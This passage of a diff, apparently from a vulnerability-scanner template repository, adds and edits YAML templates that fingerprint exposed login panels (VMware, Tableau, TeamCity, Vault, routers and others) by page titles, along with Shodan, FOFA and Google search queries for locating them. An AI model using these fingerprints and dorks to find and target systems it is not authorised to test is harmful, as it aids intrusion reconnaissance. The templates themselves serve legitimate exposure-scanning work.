+++ b/exposed-panels/tableau-panel.yaml
@@ -1,25 +1,25 @@
-id: tableau-panel
+id: tableau-panel
 
-info:
-  name: Tableau Python Server Default Page Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="Tableau-Python-Server"'
-  tags: tableau,panel,python
+info:
+  name: Tableau Python Server Default Page Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="Tableau-Python-Server"'
+  tags: tableau,panel,python
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>Tableau Python Server</title>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Tableau Python Server</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/tableau-service-manager.yaml b/exposed-panels/tableau-service-manager.yaml
new file mode 100644
index 0000000000..49fba24196
--- /dev/null
+++ b/exposed-panels/tableau-service-manager.yaml
@@ -0,0 +1,27 @@
+id: tableau-service-manager
+
+info:
+  name: Tableau Services Manager Login
+  author: DhiyaneshDk
+  severity: info
+  reference:
+    - https://help.tableau.com/current/server/en-us/sign_in_tsm.htm
+  metadata:
+    verified: true
+    shodan-query: title:"Login - Tableau Services Manager"
+  tags: panel,tableau
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Login - Tableau Services Manager</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/teamcity-login-panel.yaml b/exposed-panels/teamcity-login-panel.yaml
new file mode 100644
index 0000000000..062cd2c4db
--- /dev/null
+++ b/exposed-panels/teamcity-login-panel.yaml
@@ -0,0 +1,34 @@
+id: teamcity-login-panel
+
+info:
+  name: TeamCity Login Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.component:"TeamCity"
+  tags: panel,teamcity,jetbrains
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.html"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>Log in to TeamCity &mdash; TeamCity</title>"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'Version<\/span> ([0-9. (a-z)]+)<\/span>'
diff --git a/exposed-panels/teampass-panel.yaml b/exposed-panels/teampass-panel.yaml
new file mode 100644
index 0000000000..9934dea6b4
--- /dev/null
+++ b/exposed-panels/teampass-panel.yaml
@@ -0,0 +1,29 @@
+id: teampass-panel
+
+info:
+  name: TeamPass Panel Detect
+  author: arafatansari
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"teampass"
+  tags: panel,teampass
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/teampass"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '<title>(.*)Teampass(.*)</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/telerik-server-login.yaml b/exposed-panels/telerik-server-login.yaml
new file mode 100644
index 0000000000..3c8b1608ab
--- /dev/null
+++ b/exposed-panels/telerik-server-login.yaml
@@ -0,0 +1,28 @@
+id: telerik-server-login
+
+info:
+  name: Telerik Report Server Login
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Telerik Report Server"
+  tags: telerik,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Account/Login"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Telerik Report Server"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/telesquare/tlr-2005ksh-login.yaml b/exposed-panels/telesquare/tlr-2005ksh-login.yaml
new file mode 100644
index 0000000000..4294cbc2f8
--- /dev/null
+++ b/exposed-panels/telesquare/tlr-2005ksh-login.yaml
@@ -0,0 +1,26 @@
+id: tlr-2005ksh-login
+
+info:
+  name: Telesquare TLR-2005KSH Login Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"TLR-2005KSH"
+  tags: panel,router,telesquare
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Login to TLR-2005KSH</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/teltonika-login.yaml b/exposed-panels/teltonika-login.yaml
index f18fa0b681..5b345bcbad 100644
--- a/exposed-panels/teltonika-login.yaml
+++ b/exposed-panels/teltonika-login.yaml
@@ -9,8 +9,8 @@ info:
     - https://www.exploit-db.com/ghdb/7819
     - https://teltonika-iot-group.com/
   metadata:
-    google-dork: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci"
-  tags: panel,teltonika
+    google-query: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci"
+  tags: panel,teltonika,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/tembosocial-panel.yaml b/exposed-panels/tembosocial-panel.yaml
new file mode 100644
index 0000000000..db0858be15
--- /dev/null
+++ b/exposed-panels/tembosocial-panel.yaml
@@ -0,0 +1,27 @@
+id: tembosocial-panel
+
+info:
+  name: TemboSocial Administration Panel
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"TemboSocial Administration"
+  tags: panel,tembosocial
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin.php"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>TemboSocial Administration</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/tenda-11n-wireless-router-login.yaml b/exposed-panels/tenda-11n-wireless-router-login.yaml
index eb996dfe7f..b6bf46490b 100644
--- a/exposed-panels/tenda-11n-wireless-router-login.yaml
+++ b/exposed-panels/tenda-11n-wireless-router-login.yaml
@@ -12,9 +12,8 @@ info:
     shodan-query: http.title:"Tenda 11N Wireless Router Login Screen"
     google-query: intitle:"Tenda 11N Wireless Router Login Screen"
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     cvss-score: 0.0
-    cwe-id: CWE-419
+    cwe-id: CWE-668
   tags: panel,tenda
 
 requests:
diff --git a/exposed-panels/tenda-web-master.yaml b/exposed-panels/tenda-web-master.yaml
new file mode 100644
index 0000000000..f247017e94
--- /dev/null
+++ b/exposed-panels/tenda-web-master.yaml
@@ -0,0 +1,26 @@
+id: tenda-web-master
+
+info:
+  name: Tenda Web Master
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"Tenda Web Master"
+  tags: panel,tenda,router
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login.html'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Tenda Web Master</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/tiny-file-manager.yaml b/exposed-panels/tiny-file-manager.yaml
new file mode 100644
index 0000000000..f4c2fb5557
--- /dev/null
+++ b/exposed-panels/tiny-file-manager.yaml
@@ -0,0 +1,28 @@
+id: tiny-file-manager
+
+info:
+  name: Tiny File Manager
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"Tiny File Manager"
+  tags: panel,filemanager
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Tiny File Manager'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/tomcat/tomcat-exposed-docs.yaml b/exposed-panels/tomcat/tomcat-exposed-docs.yaml
index f218b7e3ca..1dcae7d9d6 100644
--- a/exposed-panels/tomcat/tomcat-exposed-docs.yaml
+++ b/exposed-panels/tomcat/tomcat-exposed-docs.yaml
@@ -4,6 +4,8 @@ info:
   name: Tomcat exposed docs
   author: Podalirius
   severity: info
+  metadata:
+    shodan-query: title:"Apache Tomcat"
   tags: version,tomcat,docs
 
 requests:
diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml
index aa370ea472..1a619af599 100644
--- a/exposed-panels/total-web.yaml
+++ b/exposed-panels/total-web.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6811
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/tuxedo-connected-controller.yaml b/exposed-panels/tuxedo-connected-controller.yaml
index 4b456f942a..d1ee05e22e 100644
--- a/exposed-panels/tuxedo-connected-controller.yaml
+++ b/exposed-panels/tuxedo-connected-controller.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6486
-  tags: panel,tuxedo
+  tags: panel,tuxedo,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/unauth-xproxy-dashboard.yaml b/exposed-panels/unauth-xproxy-dashboard.yaml
index 9041812254..2e76185f13 100644
--- a/exposed-panels/unauth-xproxy-dashboard.yaml
+++ b/exposed-panels/unauth-xproxy-dashboard.yaml
@@ -1,27 +1,27 @@
-id: unauth-xproxy-dashboard
+id: unauth-xproxy-dashboard
 
-info:
-  name: X-Proxy Dashboard Detect
-  author: pussycat0x
-  severity: high
-  metadata:
-    fofa-dork: "X-Proxy Dashboard"
-  tags: xproxy,panel
+info:
+  name: X-Proxy Dashboard Detect
+  author: pussycat0x
+  severity: high
+  metadata:
+    fofa-dork: "X-Proxy Dashboard"
+  tags: xproxy,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>X-Proxy</title>'
-          - 'Dashboard</a>'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>X-Proxy</title>'
+          - 'Dashboard</a>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/unifi-panel.yaml b/exposed-panels/unifi-panel.yaml
new file mode 100644
index 0000000000..09270f4fa4
--- /dev/null
+++ b/exposed-panels/unifi-panel.yaml
@@ -0,0 +1,27 @@
+id: unifi-panel
+
+info:
+  name: Unifi Network Panel
+  author: TechbrunchFR
+  severity: info
+  metadata:
+    shodan-query: http.title:"UniFi Network"
+  tags: unifi,ubnt,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>UniFi Network</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/v2924-admin-panel.yaml b/exposed-panels/v2924-admin-panel.yaml
new file mode 100644
index 0000000000..2bc0e6043e
--- /dev/null
+++ b/exposed-panels/v2924-admin-panel.yaml
@@ -0,0 +1,33 @@
+id: v2924-admin-panel
+
+info:
+  name: V2924 Admin Panel
+  author: DhiyaneshDK
+  severity: info
+  reference:
+    - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5538760399521122
+  metadata:
+    verified: true
+    shodan-query: title:"V2924"
+  tags: panel,v2924
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>V2924</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vault-panel.yaml b/exposed-panels/vault-panel.yaml
new file mode 100644
index 0000000000..3cff7c0d50
--- /dev/null
+++ b/exposed-panels/vault-panel.yaml
@@ -0,0 +1,33 @@
+id: vault-panel
+
+info:
+  name: Vault Login Panel
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-919788577
+  tags: panel,vault
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ui/vault/auth?with=oidc%2F"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<title>Vault</title>"
+          - "vault/"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/veeam-backup-gcp.yaml b/exposed-panels/veeam-backup-gcp.yaml
new file mode 100644
index 0000000000..a3556fd3b7
--- /dev/null
+++ b/exposed-panels/veeam-backup-gcp.yaml
@@ -0,0 +1,25 @@
+id: veeam-backup-gcp
+
+info:
+  name: Veeam Backup for GCP
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Veeam Backup for GCP"
+  tags: panel,google,cloud
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Veeam Backup for GCP</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/veeam-panel.yaml b/exposed-panels/veeam-panel.yaml
new file mode 100644
index 0000000000..00418ac4b8
--- /dev/null
+++ b/exposed-panels/veeam-panel.yaml
@@ -0,0 +1,30 @@
+id: veeam-panel
+
+info:
+  name: Veeam Login Panel
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-633512412
+  tags: panel,veeam
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.aspx"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Login - Veeam ONE Reporter"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vigor-login.yaml b/exposed-panels/vigor-login.yaml
index fa493a90d1..3634414a95 100644
--- a/exposed-panels/vigor-login.yaml
+++ b/exposed-panels/vigor-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6610
-  tags: panel,login
+  tags: panel,login,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/virtua-software-panel.yaml b/exposed-panels/virtua-software-panel.yaml
new file mode 100644
index 0000000000..97b9b6e199
--- /dev/null
+++ b/exposed-panels/virtua-software-panel.yaml
@@ -0,0 +1,27 @@
+id: virtua-software-panel
+
+info:
+  name: Virtua Software Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:876876147
+  tags: panel,virtua
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - '<title id="tituloPagina">Virtua Software</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vmware-carbon-black-edr.yaml b/exposed-panels/vmware-carbon-black-edr.yaml
new file mode 100644
index 0000000000..080ddedb59
--- /dev/null
+++ b/exposed-panels/vmware-carbon-black-edr.yaml
@@ -0,0 +1,26 @@
+id: vmware-carbon-black-edr
+
+info:
+  name: VMware Carbon Black EDR
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"VMware Carbon Black EDR"
+  tags: panel,vmware
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'VMware Carbon Black EDR'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vmware-cloud-availability.yaml b/exposed-panels/vmware-cloud-availability.yaml
new file mode 100644
index 0000000000..757c86f264
--- /dev/null
+++ b/exposed-panels/vmware-cloud-availability.yaml
@@ -0,0 +1,26 @@
+id: vmware-cloud-availability
+
+info:
+  name: VMware Cloud Director Availability
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"VMware Cloud Director Availability"
+  tags: panel,vmware
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ui/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>VMware Cloud Director Availability</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vmware-cloud-director.yaml b/exposed-panels/vmware-cloud-director.yaml
new file mode 100644
index 0000000000..0b2e243e25
--- /dev/null
+++ b/exposed-panels/vmware-cloud-director.yaml
@@ -0,0 +1,26 @@
+id: vmware-cloud-director
+
+info:
+  name: VMware Cloud Director
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"Welcome to VMware Cloud Director"
+  tags: panel,vmware
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Welcome to VMware Cloud Director</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vmware-ftp-server.yaml b/exposed-panels/vmware-ftp-server.yaml
new file mode 100644
index 0000000000..dcae9f07ed
--- /dev/null
+++ b/exposed-panels/vmware-ftp-server.yaml
@@ -0,0 +1,26 @@
+id: vmware-ftp-server
+
+info:
+  name: VMware FTP Server
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"VMWARE FTP SERVER"
+  tags: panel,vmware,ftp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'VMWARE FTP SERVER'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vmware-hcx-login.yaml b/exposed-panels/vmware-hcx-login.yaml
new file mode 100644
index 0000000000..f46071ef31
--- /dev/null
+++ b/exposed-panels/vmware-hcx-login.yaml
@@ -0,0 +1,26 @@
+id: vmware-hcx-login
+
+info:
+  name: VMware HCX Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"VMware HCX"
+  tags: panel,vmware
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/hybridity/ui/hcx-client/index.html'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>VMware HCX</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vmware-horizon-daas.yaml b/exposed-panels/vmware-horizon-daas.yaml
new file mode 100644
index 0000000000..36022b420f
--- /dev/null
+++ b/exposed-panels/vmware-horizon-daas.yaml
@@ -0,0 +1,28 @@
+id: vmware-horizon-daas
+
+info:
+  name: Desktop Portal VMware Horizon DaaS Trade Platform
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"Horizon DaaS"
+  tags: panel,vmware
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.action'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Desktop Portal | VMware&reg; Horizon DaaS&trade; Platform</title>'
+          - 'Desktop Portal | VMware Horizon DaaS'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vmware-horizon-panel.yaml b/exposed-panels/vmware-horizon-panel.yaml
index 596ebf0e7b..6c25866231 100644
--- a/exposed-panels/vmware-horizon-panel.yaml
+++ b/exposed-panels/vmware-horizon-panel.yaml
@@ -2,25 +2,25 @@ id: vmware-horizon-panel
 
 info:
   name: VMware Horizon Login
-  author: dhiyaneshDK
+  author: dhiyaneshDK,pdteam
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6496
-  tags: panel,horizon,vmware
+  tags: horizon,vmware,edb,panel
 
 requests:
   - method: GET
     path:
+      - "{{BaseURL}}"
       - '{{BaseURL}}/portal/webclient/index.html'
 
-    matchers-condition: or
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
     matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>VMware Horizon</title>'
-
       - type: regex
         part: body
         regex:
           - '(?m)^Missing route token in request$'
+          - 'VMware Horizon'
+        condition: or
\ No newline at end of file
diff --git a/exposed-panels/vmware-nsx-login.yaml b/exposed-panels/vmware-nsx-login.yaml
new file mode 100644
index 0000000000..c5e0ea336b
--- /dev/null
+++ b/exposed-panels/vmware-nsx-login.yaml
@@ -0,0 +1,26 @@
+id: vmware-nsx-login
+
+info:
+  name: VMware NSX Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png"
+  tags: panel,vmware
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login.jsp'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>VMware Appliance Management</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vmware-vcenter-converter-standalone.yaml b/exposed-panels/vmware-vcenter-converter-standalone.yaml
new file mode 100644
index 0000000000..b68acf8fca
--- /dev/null
+++ b/exposed-panels/vmware-vcenter-converter-standalone.yaml
@@ -0,0 +1,26 @@
+id: vmware-vcenter-converter-standalone
+
+info:
+  name: VMware vCenter Converter Standalone
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"VMware vCenter Converter Standalone"
+  tags: panel,vmware,vcenter
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'VMware vCenter Converter Standalone'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vmware-vcloud-director.yaml b/exposed-panels/vmware-vcloud-director.yaml
new file mode 100644
index 0000000000..6f01deccab
--- /dev/null
+++ b/exposed-panels/vmware-vcloud-director.yaml
@@ -0,0 +1,26 @@
+id: vmware-vcloud-director
+
+info:
+  name: VMware vCloud Director
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"VMware vCloud Director"
+  tags: panel,vmware,vcloud
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/cloud/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>VMware vCloud Director</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vrealize-loginsight-panel.yaml b/exposed-panels/vrealize-loginsight-panel.yaml
new file mode 100644
index 0000000000..fc96de977d
--- /dev/null
+++ b/exposed-panels/vrealize-loginsight-panel.yaml
@@ -0,0 +1,26 @@
+id: vrealize-loginsight-panel
+
+info:
+  name: vRealize Log Insight Panel
+  author: pussycat0x
+  severity: info
+  description: Detect vRealize Log Insight login panel
+  metadata:
+    verified: true
+    shodan-dork: title:"vRealize Log insight"
+  tags: panel,vmware,vrealize
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login?loginUrl=%2Findex"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'vRealize Log Insight'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/watchguard-panel.yaml b/exposed-panels/watchguard-panel.yaml
index 83648f5548..c74aa2b13e 100644
--- a/exposed-panels/watchguard-panel.yaml
+++ b/exposed-panels/watchguard-panel.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/7008
-  tags: panel,watchguard
+  tags: watchguard,edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/weatherlink.yaml b/exposed-panels/weatherlink.yaml
index c1834a6f1e..7f7cf4b864 100644
--- a/exposed-panels/weatherlink.yaml
+++ b/exposed-panels/weatherlink.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6007
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/web-file-manager.yaml b/exposed-panels/web-file-manager.yaml
new file mode 100644
index 0000000000..0739a62381
--- /dev/null
+++ b/exposed-panels/web-file-manager.yaml
@@ -0,0 +1,28 @@
+id: web-file-manager
+
+info:
+  name: Web File Manager
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"Web File Manager"
+  tags: panel,filemanager
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/Login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Web File Manager'
+          - 'Login'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/web-local-craft.yaml b/exposed-panels/web-local-craft.yaml
index 349640d8cd..c04530f6ad 100644
--- a/exposed-panels/web-local-craft.yaml
+++ b/exposed-panels/web-local-craft.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6800
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/web-service-panel.yaml b/exposed-panels/web-service-panel.yaml
index 942b6246ff..75b87ea4fa 100644
--- a/exposed-panels/web-service-panel.yaml
+++ b/exposed-panels/web-service-panel.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/7116
-  tags: panel,service
+  tags: edb,panel,service
 
 requests:
   - method: GET
diff --git a/exposed-panels/weblogic-uddiexplorer.yaml b/exposed-panels/weblogic-uddiexplorer.yaml
new file mode 100644
index 0000000000..e9e3e0daa0
--- /dev/null
+++ b/exposed-panels/weblogic-uddiexplorer.yaml
@@ -0,0 +1,27 @@
+id: weblogic-uddiexplorer
+
+info:
+  name: Oracle WebLogic UDDI Explorer
+  author: pdteam
+  severity: low
+  description: |
+    Oracle WebLogic UDDI Explorer allows authorized users to access and modify information about the web services published in the private WebLogic Server UDDI registries.
+  reference:
+    - https://www.tenable.com/plugins/was/112421
+  tags: panel,oracle,weblogic,tenable
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/uddiexplorer/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'WebLogic UDDI Explorer'
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/exposed-panels/webmodule-ee-panel.yaml b/exposed-panels/webmodule-ee-panel.yaml
index f302fe8874..39b57834c2 100644
--- a/exposed-panels/webmodule-ee-panel.yaml
+++ b/exposed-panels/webmodule-ee-panel.yaml
@@ -7,8 +7,9 @@ info:
   reference:
     - https://www.exploit-db.com/ghdb/7001
   metadata:
-    google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
-  tags: panel,webmodule-ee,login
+    google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
+    shodan-query: title:"Webmodule"
+  tags: edb,panel,webmodule-ee,login
 
 requests:
   - method: GET
diff --git a/exposed-panels/webshell4-login-panel.yaml b/exposed-panels/webshell4-login-panel.yaml
new file mode 100644
index 0000000000..56f2a65589
--- /dev/null
+++ b/exposed-panels/webshell4-login-panel.yaml
@@ -0,0 +1,28 @@
+id: webshell4-login-panel
+
+info:
+  name: WebShell4 Login
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"webshell4"
+  tags: webshell4,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webshell4/login.php"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "/webshell4/index2.php"
+          - "enter login name"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/weiphp-panel.yaml b/exposed-panels/weiphp-panel.yaml
new file mode 100644
index 0000000000..1105641e08
--- /dev/null
+++ b/exposed-panels/weiphp-panel.yaml
@@ -0,0 +1,31 @@
+id: weiphp-panel
+
+info:
+  name: Weiphp Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"weiphp"
+  tags: panel,weiphp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - '_blank">WeiPHP'
+          - '/weiphp.css?'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/whm-login-detect.yaml b/exposed-panels/whm-login-detect.yaml
index 558dab6e51..6668b5e22b 100644
--- a/exposed-panels/whm-login-detect.yaml
+++ b/exposed-panels/whm-login-detect.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/7128
-  tags: whm,panel,login
+  tags: edb,whm,panel,login
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-install.yaml b/exposed-panels/wordpress/wp-install.yaml
similarity index 92%
rename from vulnerabilities/wordpress/wp-install.yaml
rename to exposed-panels/wordpress/wp-install.yaml
index b14919ada6..41187e3c33 100644
--- a/vulnerabilities/wordpress/wp-install.yaml
+++ b/exposed-panels/wordpress/wp-install.yaml
@@ -6,7 +6,7 @@ info:
   severity: high
   reference:
     - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
-  tags: wordpress
+  tags: panel,wordpress
 
 requests:
   - method: GET
@@ -23,4 +23,4 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
diff --git a/exposed-panels/wowza-streaming-engine.yaml b/exposed-panels/wowza-streaming-engine.yaml
